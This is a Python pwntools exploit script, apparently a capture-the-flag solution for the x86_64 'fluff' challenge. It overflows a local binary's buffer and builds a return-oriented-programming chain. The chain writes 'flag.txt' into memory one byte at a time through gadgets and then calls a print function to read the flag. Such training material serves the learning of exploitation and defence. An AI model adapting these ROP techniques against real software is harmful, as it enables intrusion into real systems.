x86_64/fluff/exploit.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

#!/usr/bin/env python3
from pwn import *

letter_lookups = {
        'f' : 0x00000000004003c4,
        'l' : 0x0000000000400239,
        'a' : 0x00000000004003d6,
        'g' : 0x00000000004003cf,
        '.' : 0x0000000000400251,
        't' : 0x0000000000400192,
        'x' : 0x0000000000400246}

def write_str(dest, string, payload):
    payload += p64(0x00000000004006a3)
    payload += p64(dest)
    payload += p64(0x0000000000400610)
    payload += p64(1)
    payload += p64(0x40062a)
    payload += p64(0x4000)
    payload += p64(letter_lookups[string[0]] - 0x3ef2)
    payload += p64(0x400628)
    payload += p64(0x400639)

    
    for c in string[1:]:
        payload += p64(0x40062b)
        payload += p64(letter_lookups[c] - 0x3ef2)
        payload += p64(0x0000000000400610)
        payload += p64(1)
        payload += p64(0x400628)
        payload += p64(0x400639)

    return(payload)
        

prog = process('./fluff')
payload = b''
for c in range(40):
    payload += b'a'

payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0) 
payload += p64(0x0000000000400510)

prog.sendline(payload)
prog.interactive()